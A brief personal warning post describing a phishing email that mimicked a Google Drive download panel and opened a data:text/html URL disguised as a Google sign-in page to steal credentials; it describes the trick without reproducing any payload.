Just had a dodgy looking email but with a legitimate looking Drive panel with the usual offering to download or save to Drive. I should know better but I clicked it!
Instead of asking where in Drive, it opened a new tab with Google signin and a URL like:
Easy to ignore the data:text/html and be comforted by the familiar Google URL, however the rest of the URL can contain a form posting my username and password to the nasty people.
Be warned - they're getting cleverer!